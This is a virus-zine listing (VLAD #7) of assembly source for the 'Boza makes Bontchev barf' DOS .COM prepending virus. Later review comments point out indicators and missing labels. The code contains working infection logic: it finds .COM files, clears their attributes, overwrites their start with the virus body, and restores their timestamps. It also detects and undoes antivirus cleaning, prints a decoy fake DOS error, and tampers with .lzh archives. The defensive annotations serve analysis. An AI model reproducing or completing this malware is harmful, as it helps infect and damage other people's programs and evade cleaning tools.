Virus Labs & Distribution
VLAD #7 - Boza Makes Bontchev Barf Virus

; "Boza makes Bontchev barf"
;                   by Metabolis.
; When the virus is tbcleaned and run it will print either..
;      "Bad command or filename"                ; if port 40h holds a value
;                                               ; lower than 0d2h.
;       or
;      "Call this virus what you will.          ; if it's higher.
;       Boza still makes Bontchev barf :P"
; The virus will then fix itself so if the user is stupid enough
; to run it again it will keep infecting.  (Well, in a sense they're
; not stupid, after all.. the file will work again, damn destructive
; tbclean :)
; If there are any .lzh files in the current directory the virus will
; add a small com file to them all.  (note: it doesn't check if the
; archives have already been added to, so it just adds the file again,
; no harm.. just takes up more precious hdd space I guess)
; Files larger than 0fab0h, smaller than 1002, CO as the first two
; characters, starting with 0e9h,00,00 or with numbers in the filename
; won't be infected.
; I'm sure there is a lot of code here that could be optimized.
; It's lucky I don't care :)
; a86 bmbb.asm

        ; Entry stub of the prepended body (.COM image, origin 100h).
        ; NOTE(review): the labels this listing refers to (star, die, en, ...)
        ; are not defined anywhere in this copy, so it does not assemble as
        ; shown; the notes below describe only what the visible lines do.
        org     100h

        ; E9 00 00 is a near jmp with zero displacement. The same byte pair
        ; E9 00 is what the later "file infected?" compare against 00e9h
        ; tests for, so it is a fixed marker at offset 0 of a modified file.
        db      0e9h,00,00                      ; jump along

        mov     bx,0FECEh                       ; initialize tbclean check

        ; Self-modifying step: the displacement word at 101h is patched in
        ; memory and execution re-enters at 100h. Per the author's note below,
        ; an image written back to disk with this patched jump in place never
        ; executes the mov bx above, which is how a cleaned copy is recognised.
        mov     word ptr [101h],(die-star)-3    ; move the address of "die"
        mov     ax,100h                         ; to 101h then jump there.
        jmp     ax
                                                ; it then jumps to die.

        ; Fixed plain-text string inside the body: a static indicator that can
        ; be searched for in suspect .COM files.
        db      " 'Boza makes Bontchev Barf' by Metabolis "

        ; when the virus is tbcleaned (tbclean never did handle
        ; prependers correctly.) it gets written back to disk
        ; with the jump to die still at 100h, so if bx ain't FECE
        ; it has been cleaned.

        ; Per-run tally of modified files: cleared before the search starts,
        ; incremented after a successful write, and compared with 1 to stop.
counter db      00h

        ; Cleaned-copy check and decoy message.
        ; Restores the in-memory jump displacement to zero, then tests the BX
        ; tripwire value loaded by the entry stub.
        mov     word ptr[101h],0000h            ; fix initial jump.

        cmp     bx,0FECEh                       ; we been cleaned?
        je      keepgoin                        ; no, keep going.

        ; Port 40h is the PIT channel 0 counter; its low byte is used here only
        ; to choose between the two messages (unsigned compare against 0D2h).
        in      al,40h                          ; grab us a number
        cmp     al,0d2h                         ; compare al to 210
        jb      badcom                          ; below?

        mov     dx,offset barf                  ; boza makes bontchev barf.
        jmp     print

        ; The alternative text imitates the DOS "Bad command or file name"
        ; error, so a user may not realise the program actually ran.
        mov     dx,offset badcomm               ; bad command or filename.

        ; DOS function 09h prints the '$'-terminated string at DS:DX.
        mov     ah,9                            ; display stuph from ds:dx
        int     21h

        ; Self-repair of the cleaned copy: locate this program's own path in
        ; the DOS environment block, rewrite the first three bytes of the file
        ; on disk, then exit. Observable behaviour for a monitor: a .COM file
        ; opening its own image for writing during execution.
        push    ds                              ; we'll be needing this

        ; PSP offset 2Ch holds the segment of the environment block.
        mov     si,word ptr[2ch]                ; get env seg from psp

        push    si
        pop     ds                              ; change ds to env seg

        xor     bp,bp

        ; Scans for a 0000h word (end of the environment strings) followed by
        ; a 0001h word; in DOS 3+ the program's full path follows that count.
        ; Note the load is a word although the original comment says "byte".
        mov     bx,word ptr ds:[bp]             ; grab a byte from env
        inc     bp
        cmp     bx,0000h
        jne     loopme
        inc     bp
        mov     bx,word ptr ds:[bp]
        cmp     bx,0001h
        jne     loopme

        inc     bp
        inc     bp

        ; DS:BP now addresses the path string; 3D01h opens it write-only.
        ; The carry flag is not checked after the open.
        mov     ax,3d01h                        ; open the current file
        mov     dx,bp
        int     21h

        xchg    ax,bx                           ; the usual.

        pop     ds

        ; Three bytes from the in-memory body (label star, not shown in this
        ; listing) are written at file offset 0, replacing the patched jump.
        mov     ah,40h                          ; write 3 bytes that will
        mov     cx,3                            ; fix the virus back up.
        mov     dx,star
        int     21h

        mov     ah,3eh                          ; close file
        int     21h

        ; Terminates with exit code 0; the host program is not run on this path.
        mov     ax,4c00h                        ; time to retreat.
        int     21h


        ; Start of the file search: clear the per-run counter, move the DTA out
        ; of the PSP, and begin a find-first over the current directory.
        mov     byte ptr[counter],00h

        ; Function 1Ah sets the Disk Transfer Area; the address is the value
        ; stored in the word "total".
        mov     ah,1Ah
        mov     dx,word ptr[total]              ; relocate the dta
        int     21h                             ; to the very end of the virus
                                                ; (plus infectee length)
        ; Find-first with attribute mask 7 (read-only, hidden, system) against
        ; the pattern in fmask ("*.c?m"). Only the current directory is
        ; searched; no path component is supplied.
        mov     ah,4eh
        mov     cx,7                            ; find first file
        mov     dx,offset fmask
        int     21h
        jnc     checks                          ; no error? check it out.
        jmp     returnhost

        ; Candidate filters, read from the find-first record in the DTA:
        ; offset 1Ah = low word of the file size, offset 1Eh = file name.
        mov     bp,word ptr[total]              ; put filesize in cx
        mov     cx,word ptr[bp+1ah]

        ; Unsigned size window: files above 0FAB0h or below 1002 bytes are skipped.
        cmp     cx,0fab0h                       ; too big?
        ja      findn

        cmp     cx,1002                         ; too small?
        jb      findn

        ; 'OC' as a little-endian word is the two characters "CO" at the start
        ; of the name (the header comment lists this exclusion).
        cmp     word ptr[bp+1eh],'OC'           ;
        je      findn

        mov     si,bp
        mov     cx,8
        xor     ax,ax

        ; Loop over 8 name bytes; any byte in the range 30h..39h (an ASCII
        ; digit) rejects the file. The loop labels are not shown in this listing.
        cmp     byte ptr [si+1eh],30h           ; this routine checks to
        jb      cont                            ; see if there are any
        cmp     byte ptr [si+1eh],39h           ; numbers in the filename
        ja      cont                            ; of the infectee.
        jmp     findn

        inc     si
        loop    looptime

        ; Attribute reset, open, and already-modified / EXE checks.
        ; Function 4301h sets the file's attributes to 20h (archive only),
        ; which clears read-only, hidden and system. An attribute change
        ; immediately followed by a read/write open is an observable sequence.
        mov     ax,4301h
        lea     dx,[bp+1eh]                     ; fix up the attributes
        mov     cx,20h                          ; to nothing incase the
        int     21h                             ; file is read only or
        jc      findn                           ; something.

        mov     ax,3d02;                        ; open file for read/write
        lea     dx,[bp+1eh]
        int     21h
        jnc     fixhandle
        jmp     fn

        xchg    bx,ax

        mov     ah,03fh                         ; read 3 bytes from file
        mov     cx,3                            ; put in temp
        mov     dx,offset temp
        int     21h

        ; First two bytes E9 00 are treated as "already modified"; this is the
        ; same pair the body carries at its own offset 0.
        cmp     word ptr[temp],00e9h            ; file infected?
        je      fn

        ; 8-bit sum of the first two bytes compared with 167 = 4Dh + 5Ah
        ; ("MZ"), i.e. an EXE image stored under a .COM name. Being an 8-bit
        ; sum, other byte pairs with the same total are skipped as well.
        mov     cx,word ptr[temp]
        add     cl,ch
        cmp     cl,167                          ; an incognito EXE?
        je      fn

        jmp     pushups

        ; Trampoline: short conditional jumps cannot reach findnext directly.
        jmp     findnext                        ; damn jumps > 128 :|

        ; File modification sequence. Net effect visible on disk: the first
        ; (en-star) bytes of the file are replaced by the body and the original
        ; bytes are appended at the end, so the file grows by (en-star) bytes.
        ; Attributes and timestamp are put back afterwards, so size and content
        ; hash are the indicators to rely on, not the date.
        ; NOTE(review): the helper "sof" is called below but is not part of
        ; this listing; presumably it seeks to the start of the file - confirm.
        mov     ax,4200h                        ; seek to the beginning
        cwd                                     ; of the file
        xor     cx,cx
        int     21h

        call    sof

        ; Reads the file's first (en-star) bytes into a buffer 42 bytes past
        ; the address held in "total"; SI keeps that buffer address.
        mov     ah,03fh
        mov     cx,en-star                      ; read start of infectee
        mov     dx,word ptr[total]              ; and put it after the
        add     dx,42                           ; relocated DTA
        mov     si,dx
        int     21h

        ; The current "total" is parked in temp while a value computed for the
        ; target (size + 100h + body length) is stored in its place, so the
        ; body image written next carries the target's own value.
        mov     cx,word ptr[total]              ; could probably push
        mov     word ptr[temp],cx               ; word ptr [total] heh

        mov     cx,word ptr[bp+1ah]
        add     cx,100h                         ; fix up the new total
        add     cx,(en-star)                    ; file length of the infectee
        mov     word ptr[total],cx              ; (+100h)

        call    sof

        ; Writes (en-star) bytes starting at label star over the file's start.
        mov     ah,40h
        mov     cx,en-star                      ; write virus to file
        mov     dx,star
        int     21h

        mov     cx,word ptr[temp]               ; restore total
        mov     word ptr[total],cx

        ; Enters sof three bytes past its start with AX preloaded with 4202h
        ; (seek relative to end of file) - presumably skipping sof's own load
        ; of AX; confirm against the full source.
        mov     ax,4202h                        ; seek to end of file
        call    sof+3

        mov     ah,40h                          ; write the overwritten
        mov     cx,en-star                      ; infectee code to the
        lea     dx,[si]                         ; end of the file.
        int     21h
        jc      fn

        inc     byte ptr[counter]               ; increment that infect cntr.

        ; Original attribute byte (DTA+15h) and time/date (DTA+16h, DTA+18h)
        ; from the find-first record are written back via 4301h and 5701h.
        mov     cl,byte ptr[bp+15h]             ; restore original
        lea     dx,[bp+1eh]                     ; attributes to the file
        mov     ax,4301h
        int     21h

        mov     cx,word ptr[bp+16h]             ; restore date and time
        mov     dx,word ptr[bp+18h]
        mov     ax,5701h
        int     21h

        mov     ah,3eh                          ; close file
        int     21h

        ; At most one file is modified per run: once counter equals 1 the
        ; search stops and control goes to returnhost.
        cmp     byte ptr[counter],1             ; infected a file?
        je      returnhost                      ; yea, we out.

        mov     ah,4fh                          ; find another file.
        int     21h
        jc      returnhost
        jmp     checks                          ; open it up


        ; Archive tampering: every file matching fmask2 ("*.lzh") in the
        ; current directory has a fixed block of bytes written over its last
        ; byte. As the header comment says, there is no check for archives
        ; already processed, so repeated runs add the member again.
        mov     ah,4eh
        mov     cx,7                            ; find first lzh
        mov     dx,offset fmask2
        int     21h
        jc      audi

        ; BP still addresses the DTA record; the name at DTA+1Eh is opened
        ; write-only. The result of the open is not checked.
        mov     ax,3d01h
        lea     dx,[bp+1eh]                     ; open it up for write axs
        int     21h

        xchg    ax,bx                           ; fix the file handle

        ; 4201h seeks relative to the current position (0 right after open),
        ; using only the low word of the size from DTA+1Ah, minus one.
        mov     ax,4201h                        ; goto eof-1
        mov     dx,word ptr[bp+1ah]
        dec     dx
        xor     cx,cx
        int     21h

        ; Writes the bytes between labels dump and enddump - presumably the
        ; db block described as "a useless com file"; the labels themselves
        ; are not shown in this listing.
        mov     ah,40h                          ; write the lzh header
        mov     cx,enddump-dump
        mov     dx,offset dump
        int     21h

        mov     ah,3eh                          ; close the file
        int     21h

        mov     ah,4fh                          ; find another file.
        int     21h
        jc      audi                            ; error? .. we out
        jmp     openlzh

        ; Hand-over to the original program.
        ; The DTA is pointed back at 80h, the default location inside the PSP,
        ; so the host sees the command tail area where it expects it.
        mov     ah, 1ah
        mov     dx, 80h                         ; DTA back to 80h
        int     21h

        ; The bytes between proced and proceden are copied to the address held
        ; in "total" and executed from there, because the copy that follows
        ; overwrites the region starting at 100h.
        mov     si,offset proced
        mov     di,word ptr[total]              ; move the return to host
        mov     cx,proceden-proced              ; code to the end of
        rep     movsb                           ; everything so it doesn't
        mov     ax,word ptr[total]              ; get overwritten.
        jmp     ax

        ; Copies (en-star) bytes from [total]-(en-star) down to 100h, then
        ; jumps to 100h. Presumably these are the host's saved leading bytes;
        ; the labels that bound this routine are not shown in this listing.
        mov     si,word ptr[total]
        sub     si,en-star                      ; put everything back at
        mov     di,100h                         ; 100h like it should be.
        mov     cx,en-star
        rep     movsb

        mov     ax,100h                         ; ribbit.
        jmp     ax

; Message shown by a cleaned copy when the timer byte is 0D2h or above.
; '$' terminates the string for DOS function 09h. Static text indicator.
barf    db      "Call this virus what you will.",0dh,0ah
        db      "Boza still makes Bontchev barf :P$"

; Block written into *.lzh archives. The leading bytes decode as an LZH member
; header: 45,108,104,53,45 is the method string "-lh5-" and 66,66,46,67,79,77
; is the member name "BB.COM"; the block ends with a single 0 byte. An
; unexpected BB.COM member in an archive is therefore an indicator.
db 31,68,45,108,104,53,45,98,0,0,0              ; a useless com file
db 109,0,0,0,118,90,91,32,32,1,6
db 66,66,46,67,79,77,24,170,77,0,0
db 0,99,82,118,174,39,3,52,69,6,127
db 240,96,208,247,128,204,12,79,185,191,195
db 77,93,80,188,189,225,67,11,79,124,30
db 227,56,0,20,184,187,245,221,57,235,200
db 199,186,135,111,132,82,2,149,108,146,150
db 60,218,70,210,92,204,140,163,65,237,156
db 225,125,177,35,189,173,35,83,26,185,24
db 141,13,5,115,111,231,84,144,223,70,238
db 139,227,11,252,154,39,168,118,158,192,0

; Decoy text imitating the DOS error message; shown by a cleaned copy when the
; timer byte is below 0D2h.
badcomm db      "Bad command or file name",0dh,0ah,"$"

; Search patterns (NUL-terminated for find-first): .COM-style names and LZH archives.
fmask   db      "*.c?m",00h
fmask2  db      "*.lzh",00h
; 3-byte scratch: first bytes read from a candidate file, also used to park "total".
temp    db      00,00,00
; Address used for the relocated DTA and for the relocated return-to-host code.
; Initial value is twice the body length plus 100h; it is rewritten per target
; before the body is written out.
total   dw      ((en-star)*2)+100h


; Dummy host program carried by this source build: prints a string and exits.
; The hard-coded 0109h assumes this code runs at offset 100h: the four
; instructions occupy 9 bytes, so the text starts at 109h.
host:                                           ; our little host program
        mov     ah,9                            ; DOS print '$'-terminated string
        mov     dx,0109h
        int     21h
        int     20h                             ; terminate program
        db      "Did you really want to run this?",0dh,0ah
        db      "Metabolis - 1996","$"


